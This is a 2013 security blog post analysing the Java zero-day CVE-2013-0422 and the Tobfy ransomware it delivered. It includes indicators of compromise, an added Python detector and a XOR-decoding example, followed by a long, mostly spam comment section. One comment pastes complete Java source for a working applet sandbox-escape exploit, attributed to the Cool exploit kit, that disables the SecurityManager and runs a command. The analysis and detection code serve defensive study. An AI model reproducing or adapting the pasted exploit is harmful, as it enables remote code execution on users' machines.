New Zero-Day Java Exploit
Julia Wolf, Darien Kindlund, and James Bennett from FireEye, in their post "Happy New Year from new Java Zero-day", observed that a Java security bypass zero-day vulnerability (CVE-2013-0422) has been actively exploited in the wild since Jan. 2. They were able to reproduce the attack in-house with the latest Java 7 update (Java 7 Update 10) on Windows.
Some initial landing pages are actually hosted on a popular file-sharing website. Eventually the landing pages redirect to several different domains hosting exploits and malware.
By exploiting the vulnerability, the exploit code downloads an executable file from a remote server and executes it. Though the malware itself is designed for Windows only, the vulnerability can be exploited across different browsers and OS platforms.
The malware payload is ransomware, commonly known as Tobfy. It retrieves a template from the Web, in this case:
hxxp://<random>.cristmastea.info/get.php
and creates a full-screen window demanding payment, using a social engineering scheme to scare the victim. Additionally, it disables Windows Safe Mode by deleting values under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
and it terminates processes such as “taskmgr.exe,” “msconfig.exe,” “regedit.exe,” and “cmd.exe” to deter the victim from finding or disabling the malware. Strings such as \\xneo\\lock\\Release\\lock.pdb and “Conteneur ActiveX” were found in memory and helped make identification easier.
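As an added example (my own code, not from the original post or from FireEye's analysis), here is a small Python detector for the behaviours just described: deletion under the SafeBoot key, termination of the named administrative tools, and the identifying strings in memory. The event schema and the sample records are constructed for the example and are not real EDR telemetry; the registry subkey under SafeBoot in the sample is a placeholder.

```python
"""Behavioural indicators for the Tobfy ransomware described in the post.

Event records follow a constructed schema (not real EDR telemetry):
  {"type": "reg_delete",     "pid": int, "key": str}
  {"type": "proc_terminate", "pid": int, "target": str}
  {"type": "mem_string",     "pid": int, "value": str}
"""

# Indicators quoted in the analysis above.
SAFEBOOT_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"
KILLED_TOOLS = {"taskmgr.exe", "msconfig.exe", "regedit.exe", "cmd.exe"}
MEMORY_STRINGS = (r"\xneo\lock\Release\lock.pdb", "Conteneur ActiveX")


def score_events(events):
    """Return {pid: set(indicator)} for every process seen in the events."""
    hits = {}
    for ev in events:
        found = hits.setdefault(ev["pid"], set())
        kind = ev["type"]
        if kind == "reg_delete" and ev["key"].lower().startswith(SAFEBOOT_KEY.lower()):
            found.add("safeboot_tamper")
        elif kind == "proc_terminate" and ev["target"].lower() in KILLED_TOOLS:
            found.add("kills:" + ev["target"].lower())
        elif kind == "mem_string" and any(s in ev["value"] for s in MEMORY_STRINGS):
            found.add("tobfy_string")
    return hits


def flag_ransomware(events, min_tools=2):
    """Pids that both tamper with SafeBoot and terminate at least `min_tools`
    of the listed tools. Requiring both avoids flagging an admin script that
    merely kills cmd.exe, or a cleanup tool that deletes one SafeBoot value.
    The memory-string hit is reported by score_events() but not required
    here, because it is specific to this sample."""
    flagged = []
    for pid, found in score_events(events).items():
        kills = sum(1 for f in found if f.startswith("kills:"))
        if "safeboot_tamper" in found and kills >= min_tools:
            flagged.append(pid)
    return sorted(flagged)


# Constructed sample events: pid 4242 mimics the behaviour described in the
# post, pid 100 is a benign script, pid 7 deletes an unrelated registry value.
SAMPLE_EVENTS = [
    {"type": "reg_delete", "pid": 4242,
     "key": SAFEBOOT_KEY + r"\Minimal\{PLACEHOLDER-SUBKEY}"},
    {"type": "proc_terminate", "pid": 4242, "target": "taskmgr.exe"},
    {"type": "proc_terminate", "pid": 4242, "target": "regedit.exe"},
    {"type": "proc_terminate", "pid": 4242, "target": "CMD.EXE"},
    {"type": "mem_string", "pid": 4242, "value": r"C:\xneo\lock\Release\lock.pdb"},
    {"type": "proc_terminate", "pid": 100, "target": "cmd.exe"},
    {"type": "reg_delete", "pid": 7,
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Example\Stale"},
]

if __name__ == "__main__":
    print("flagged pids:", flag_ransomware(SAMPLE_EVENTS))
    print("details:", score_events(SAMPLE_EVENTS))
```

The two-indicator requirement is the design point: each behaviour on its own has benign explanations, but a single process that disables Safe Mode and then kills the tools a user would reach for is exactly the pattern the post describes.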
One more noteworthy finding is that the URLs used to download the template and make callbacks are stored XOR-encoded and must be decoded before use. However, the author appears to have forgotten to call the decode function in the callback thread, so the malware is unable to communicate with the attacker. The malware is supposed to make an HTTP request for
hxxp://<random>.my-files-download.ru/status.php
but instead requests the invalid URL
hxxp://<random>.my-files-download.ru/.ru`utr/qiq
What makes this error even worse for victims is that this callback thread determines whether the victim has paid the fee and is responsible for removing the ransomware from the system. Even paying up will do no good in this case!
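As an added example (my own Python, not from the original post or the analysts it cites), the code below does two things with the callback bug described above. First, it recovers the single-byte XOR key from the valid and invalid paths quoted in the post and confirms that the invalid URL is simply the still-encoded string; the key value of 0x01 is my inference from those two strings, not something the post states. Second, it generalises beyond the post's single pair with a brute-force sweep that finds such encoded URLs in an arbitrary blob, the kind of check an analyst runs over a sample before reading its strings. The sample blob and its host name are constructed.

```python
import re


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; XOR is its own inverse, so this encodes and decodes."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(encoded: bytes, known_plain: bytes):
    """Derive the key from a known plaintext/ciphertext pair and verify that
    one key explains every byte. Returns None when the pair does not fit."""
    if not encoded or len(encoded) != len(known_plain):
        return None
    key = encoded[0] ^ known_plain[0]
    return key if xor_bytes(encoded, key) == known_plain else None


# The two callback paths quoted in the post: the one actually requested
# (still encoded) and the one the author intended.
OBSERVED_PATH = b".ru`utr/qiq"
INTENDED_PATH = b"/status.php"


def explain_callback_bug():
    """Show that the broken request is the intended path minus the decode step.
    Returns (key, decoded_path) or None if no single-byte key fits."""
    key = recover_single_byte_key(OBSERVED_PATH, INTENDED_PATH)
    if key is None:
        return None
    return key, xor_bytes(OBSERVED_PATH, key)


def find_xored_strings(blob: bytes, markers=(b"http://", b".php"), min_len=8):
    """Sweep all 256 single-byte keys over a blob and report printable runs that
    contain a marker once decoded. This is the classic xorsearch-style sweep
    and goes beyond the post's single pair; returns (key, offset, text) hits."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    hits = []
    for key in range(256):
        decoded = xor_bytes(blob, key)
        for run in pattern.finditer(decoded):
            if any(m in run.group() for m in markers):
                hits.append((key, run.start(), run.group()))
    return hits


# Constructed sample: a URL with a hypothetical host, XOR-encoded with key 0x5A
# and padded with bytes that stay non-printable under that key.
SAMPLE_URL = b"http://example.invalid/status.php"
SAMPLE_BLOB = b"\xa0\xa1" + xor_bytes(SAMPLE_URL, 0x5A) + b"\xff\xfe"

if __name__ == "__main__":
    print(explain_callback_bug())
    print(find_xored_strings(SAMPLE_BLOB))
```

Under the recovered key the template path from the post, /get.php, would be stored as .fdu/qiq, which is the shape to look for if a sample's strings contain URL-like fragments that are off by one bit.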
January 27, 2013 at 5:03 pm
Aw, this was a very nice post. Finding the time and actual effort to generate a superb
article… but what can I say… I hesitate a whole lot and don’t seem to get anything done.
January 28, 2013 at 12:17 am
I just could not depart your site prior to suggesting
that I extremely loved the usual info an individual provides for your guests.
I'm gonna be back continuously in order to investigate and cross-check new
posts.
January 28, 2013 at 3:53 am
It is in point of fact a nice and useful piece of info.
I’m happy that you shared this useful information with us. Please keep us informed like this. Thank you for sharing.
January 28, 2013 at 5:26 am
Hello there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog
and look forward to new updates.
January 28, 2013 at 8:31 am
Your style is so unique compared to other people I have read
stuff from. Thanks for posting when you’ve got the opportunity, guess I’ll just bookmark this page.
January 29, 2013 at 4:46 am
It’s actually a nice and useful piece of information. I am glad that you just shared this helpful information with us. Please keep us up to date like this. Thank you for sharing.
January 29, 2013 at 10:22 am
Woah, this weblog is wonderful, I really like studying your articles. Keep up the great work! You already know, a lot of people are looking round for this info; you could help them greatly.
January 29, 2013 at 1:36 pm
What’s up Dear, are you in fact visiting this web site regularly, if so then you will definitely get pleasant knowledge.
January 29, 2013 at 3:27 pm
Wow, this piece of writing is nice, my younger sister is analyzing these kinds of things, thus I am going to convey her.
January 30, 2013 at 12:13 am
For the reason that the admin of this web site is working, no
question very shortly it will be well-known, due to its quality contents.
January 30, 2013 at 8:08 am
Hello, I enjoy reading all of your article.
I wanted to write a little comment to support you.
January 30, 2013 at 9:58 am
Aw, this was an exceptionally good post. Finding the time and actual effort to produce a top notch article… but what can I say… I procrastinate a whole lot and never seem to get nearly anything done.
January 30, 2013 at 10:13 am
I really like your blog. Very nice colors & theme.
Did you create this website yourself or did you hire someone to do it for you?
Plz respond as I’m looking to create my own blog and would like to find out where u got this from. many thanks
January 30, 2013 at 12:15 pm
I have been exploring for a bit for any high-quality articles
or blog posts in this sort of house. Exploring in Yahoo I
at last stumbled upon this site. Studying this info, I am happy to show that I have an incredibly excellent uncanny feeling
I found out exactly what I needed. I most without a doubt will make certain to
not omit this website and give it a glance regularly.
January 30, 2013 at 6:24 pm
Admiring the hard work you put into your blog and detailed information you provide.
It’s awesome to come across a blog every once in a while that isn’t the same
out of date rehashed material. Great read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.
January 31, 2013 at 3:15 am
Your method of describing all in this piece of writing is in fact fastidious, all can simply understand it, Thanks a lot.
January 31, 2013 at 6:22 am
It’s not my first time paying a visit to this web page; I am visiting this site daily and obtain good information from here all the time.
January 31, 2013 at 8:33 am
I am not sure the place you’re getting your information, however great topic. I need to spend a while finding out much more or working out more. Thanks for great info, I used to be on the lookout for this info for my mission.
February 1, 2013 at 1:28 am
Hey There. I found your blog using msn. This is
a very well written article. I’ll make sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.
February 1, 2013 at 8:38 am
Nice post. I was checking constantly this blog and I am impressed!
Very useful information particularly the last part 🙂 I care for such info much.
I was seeking this certain information for a long time.
Thank you and best of luck.
February 1, 2013 at 4:47 pm
I like it when folks get together and share thoughts.
Great site, keep it up!
February 1, 2013 at 4:53 pm
Hi there, it's a pleasant piece of writing about media print; we all are familiar that media is
an impressive source of information.
February 1, 2013 at 9:36 pm
You really make it seem so easy together with your presentation however
I in finding this topic to be actually something which
I feel I would never understand. It kind of feels too complicated and extremely large for
me. I’m taking a look forward in your next publish, I’ll attempt to get the grasp of it!
February 2, 2013 at 4:02 am
Woah! I’m really loving the template/theme of this site. It’s simple, yet effective.
A lot of times it’s challenging to get that “perfect balance” between superb usability and visual appeal. I must say that you’ve done an
amazing job with this. In addition, the blog loads super fast
for me on Chrome. Excellent Blog!
February 2, 2013 at 4:45 am
After looking over a few of the articles on your web site, I seriously like
your technique of blogging. I book-marked it to my bookmark
website list and will be checking back soon. Please check out my web site as well and tell me what you think.
February 2, 2013 at 8:35 am
Thnx for writing this information on your website.
February 2, 2013 at 2:08 pm
I don’t know whether it’s just me or if perhaps everybody else encountering problems with your blog.
It seems like some of the written text in your posts are running
off the screen. Can someone else please comment and let me
know if this is happening to them too? This may be an issue with my browser
because I’ve had this happen before. Kudos
February 3, 2013 at 3:26 am
Hey there! This is my first comment here so I just wanted to give a quick shout out
and tell you I genuinely enjoy reading your posts. Can
you suggest any other blogs/websites/forums that cover the same subjects?
Thank you!
February 5, 2013 at 12:27 pm
Hmm, it appears like your site ate my first comment (it was super long) so I guess I’ll just sum up what I submitted and say, I’m
thoroughly enjoying your blog. I too am an aspiring blog blogger but I’m still new to everything. Do you have any tips and hints for first-time blog writers? I’d really
appreciate it.
February 7, 2013 at 6:13 am
I needed to thank you for this excellent read!! I definitely loved every bit of it.
I have got you book-marked to check out new stuff you post…
February 7, 2013 at 3:30 pm
This design is stellar! You definitely know how to keep a reader entertained.
Between your wit and your videos, I was almost moved to start
my own blog (well, almost…HaHa!) Wonderful job.
I really enjoyed what you had to say, and more than that, how you presented it.
Too cool!
February 10, 2013 at 5:37 pm
Thank you for the auspicious writeup. It in fact was a leisure account it.
Look complicated to more brought agreeable from you!
However, how could we keep up a correspondence?
February 11, 2013 at 6:39 am
Incredible points. Outstanding arguments. Keep up the
good work.
February 12, 2013 at 4:43 pm
You need to be a part of a contest for one of the greatest blogs online.
I most certainly will recommend this blog!
February 12, 2013 at 7:12 pm
Do you mind if I quote a couple of your articles as long as I provide credit and sources back
to your weblog? My blog site is in the very same
niche as yours and my users would certainly benefit from a lot of the information you present here.
Please let me know if this is alright with you. Cheers!
February 18, 2013 at 3:57 pm
sure
February 12, 2013 at 9:46 pm
Does your website have a contact page? I’m having a tough time locating it but, I’d like to shoot
you an email. I’ve got some recommendations for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it expand over time.
February 18, 2013 at 4:17 pm
you can find all the details there…
February 14, 2013 at 12:44 am
I love it when people get together and share ideas. Great
site, keep it up!
February 14, 2013 at 2:50 am
I am sure this article has touched all the internet people,
it’s a really, really good piece of writing on building up a new website.
February 14, 2013 at 5:44 am
Magnificent beat! I wish to apprentice while you amend your web site, how
can I subscribe for a blog website? The account helped me
an acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear concept
February 14, 2013 at 9:50 am
Excellent items from you, man. I’ve taken into account your stuff previous to and you’re just extremely
magnificent. I actually like what you have bought here, certainly like what you’re saying and the way wherein you assert it. You are making it entertaining and you still take care of to stay it smart. I can not wait to read far more from you. This is really a wonderful web site.
February 15, 2013 at 4:35 am
Hello there! I know this is kinda off topic but I was wondering
which blog platform are you using for this site? I’m getting sick and tired of WordPress because I’ve had problems with hackers and I’m looking at alternatives for another platform. It would be fantastic if you could point me in the direction of a good platform.
February 15, 2013 at 1:13 pm
I’m using WordPress.
Harden your password…
February 16, 2013 at 7:01 pm
We stumbled over here from a different website and thought I might
as well check things out. I like what I see so I am just following you.
Look forward to going over your web page for a second time.
February 17, 2013 at 1:03 pm
I’m not that much of an internet reader to be honest but your blog's really nice, keep it up!
I’ll go ahead and bookmark your site to come back later on. All the best
February 17, 2013 at 2:56 pm
Definitely consider that which you said. Your favorite justification seemed to be on the
net the easiest thing to take into account of. I say to you,
I definitely get annoyed even as folks think about
issues that they just don’t know about. You managed to hit the nail upon the top and defined out the entire thing without having side-effects, people can take a signal. Will probably be back to get more. Thanks
February 17, 2013 at 10:58 pm
Hi, Neat post. There’s an issue along with your web site in web explorer, may test this? IE nonetheless is the market chief and a huge part of other people will omit your fantastic writing because of this problem.
February 18, 2013 at 1:51 am
Do you mind if I quote a few of your posts as long as I provide credit and sources back to your webpage?
My website is in the very same area of interest as
yours and my visitors would definitely benefit from a lot of
the information you present here. Please let me know if this is
alright with you. Regards!
February 18, 2013 at 3:59 pm
Sure.
February 19, 2013 at 4:16 pm
I couldn’t resist commenting. Perfectly written!
February 20, 2013 at 1:23 am
Hello! I could have sworn I’ve been to this website before but right after browsing by means of some with the post I realized it is new to me. Nonetheless, I’m surely happy I found it and I’ll be book-marking and checking back often!
February 20, 2013 at 8:03 am
This is my first time paying a visit here and I am truly happy to
read all in one place.
February 20, 2013 at 12:54 pm
You are so interesting! I don’t think I’ve read anything like
that before. So good to find another person with original
thoughts on this topic. Seriously.. thank you for starting this
up. This site is one thing that is required on the internet, someone with a little originality!
February 20, 2013 at 1:19 pm
Quite informative post. Your current Site style is awesome as nicely!
February 20, 2013 at 4:17 pm
/*
 * From Paunch with love (Java 1.7.0_11 Exploit)
 *
 * Deobfuscated from Cool EK by SecurityObscurity
 *
 * https://twitter.com/SecObscurity
 */
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;

public class PaunchGift extends Applet
{
    public void init()
    {
        try
        {
            int length;
            byte[] buffer = new byte[5000];
            ByteArrayOutputStream os = new ByteArrayOutputStream();
            // read in the class file from the jar
            InputStream is = getClass().getResourceAsStream("Payload.class");
            // and write it out to the byte array stream
            while ((length = is.read(buffer)) > 0)
                os.write(buffer, 0, length);
            // convert it to a simple byte array
            buffer = os.toByteArray();
            // resolve classes from a restricted package via the JMX MBeanInstantiator
            Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
            Method method = getMethod(class1, "enter", true);
            Object obj = method.invoke(null, new Object[0]);
            Method method1 = getMethod(class1, "createClassLoader", false);
            Object obj1 = method1.invoke(obj, new Object[1]);
            Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
            Method method2 = getMethod(class2, "defineClass", false);
            // define the embedded Payload class with the privileged class loader
            Class my_class = (Class) method2.invoke(obj1, new Object[] { null, buffer });
            my_class.newInstance();   // Payload's constructor disables the SecurityManager
            Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
            m_outSandbox.invoke(null, new Object[] {});
        }
        catch (Throwable localThrowable) {}
    }

    // look up a declared method by name without going through getDeclaredMethods();
    // flag==true restricts the match to the zero-argument overload
    private Method getMethod(Class class1, String s, boolean flag)
    {
        try {
            Method[] amethod = (Method[]) Introspector.elementFromComplex(class1, "declaredMethods");
            for (int i = 0; i < amethod.length; i++) {
                Method method = amethod[i];
                String s1 = method.getName();
                Class[] aclass = method.getParameterTypes();
                if (s1.equals(s) && ((!flag) || (aclass.length == 0))) return method;
            }
        } catch (Exception localException) {}
        return null;
    }

    // MBeanInstantiator.findClass() is reachable from untrusted code and returns
    // classes the applet class loader would otherwise be denied
    private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
    {
        Object obj = null;
        JmxMBeanServer jmxmbeanserver = (JmxMBeanServer) JmxMBeanServer.newMBeanServer("", null, null, true);
        MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
        Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
        Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
        return (Class) method.invoke(mbeaninstantiator, new Object[] { s, obj });
    }
}
###############################################
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class Payload implements PrivilegedExceptionAction
{
    public Payload()
    {
        try
        {
            // run() executes with the privileges of this class's (trusted) loader
            AccessController.doPrivileged(this);
        }
        catch (Exception exception) {}
    }

    public Object run() throws Exception
    {
        // equivalent to System.setSecurityManager(null): removes the applet sandbox
        Class cl = System.class;
        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
        m.invoke(null, new Object[1]);
        return null;
    }

    public static void outSandbox() throws Exception
    {
        // proof-of-concept action once the SecurityManager is gone
        Runtime.getRuntime().exec("calc.exe");
    }
}
February 21, 2013 at 8:03 am
Wonderful blog! I found it while browsing on Yahoo News. Do you have any suggestions on how
to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Appreciate it
February 21, 2013 at 9:06 am
Just desire to say your article is astounding. The clearness in your post is just great and I could
assume you’re an expert on this subject. Fine with your permission, let me grab your feed to keep up to date with forthcoming posts. Thanks a million and please keep up the enjoyable work.
February 21, 2013 at 1:05 pm
Wow, that was odd. I just wrote a really long comment but after I clicked
submit my comment didn’t appear. Grrrr… well I’m not writing all that over again.
Anyways, just wanted to say fantastic blog!
February 21, 2013 at 6:38 pm
Good way of describing, and nice paragraph to take facts about my presentation subject matter, which I am going to present in an institution
of higher education.
February 21, 2013 at 9:50 pm
I delight in, lead to I found exactly what I was looking for.
You’ve ended my 4 day lengthy hunt! God Bless you man. Have a great day. Bye
February 25, 2013 at 2:34 am
There’s definitely a great deal to learn about this issue. I love all of the points you have made.
February 25, 2013 at 5:11 am
Thanks for the auspicious writeup. It if truth be told was an enjoyment
account it. Glance advanced to far brought agreeable from you!
By the way, how can we communicate?
February 27, 2013 at 1:46 pm
February 27, 2013 at 1:06 am
For most up-to-date news you have to go to see world-wide-web and on the web I found
this web page as a most excellent web page for newest updates.
February 27, 2013 at 4:10 am
Hey There. I found your weblog the usage of msn.
That is a very smartly written article. I will be sure to bookmark it and return to learn more of your helpful info.
Thank you for the post. I’ll certainly return.
February 27, 2013 at 5:26 am
It’s remarkable in support of me to have a web page, which is good designed for my know-how. thanks admin
March 2, 2013 at 4:06 am
I simply want to tell you that I am a newbie to blogging and site-building and absolutely liked your web blog. Likely I’m going to bookmark your blog post. You absolutely have good article content. Many thanks for sharing with us your website.
March 3, 2013 at 12:02 am
Yes! Finally someone writes about acme brick.
March 4, 2013 at 4:47 am
I think this is among the most vital info for me.
And I am glad reading your article. But should remark on
few general things, The web site style is wonderful, the articles is really great
: D. Good job, cheers
April 3, 2013 at 2:38 am
Appreciate this post. Will try it out.
April 5, 2013 at 7:10 pm
Howdy! I simply wish to give you a big thumbs up for your
excellent information you’ve got here on this post. I will be returning to your site for more soon.
January 7, 2014 at 5:46 am
This might seem kinda creepy but I really like the way you speak. Anyways, great video! I look forward to more of these videos 🙂
January 9, 2014 at 6:11 pm
Great video, Fun and succinctly explained.. Will use it an introduction when I am giving talks to genealogists and historians on blogging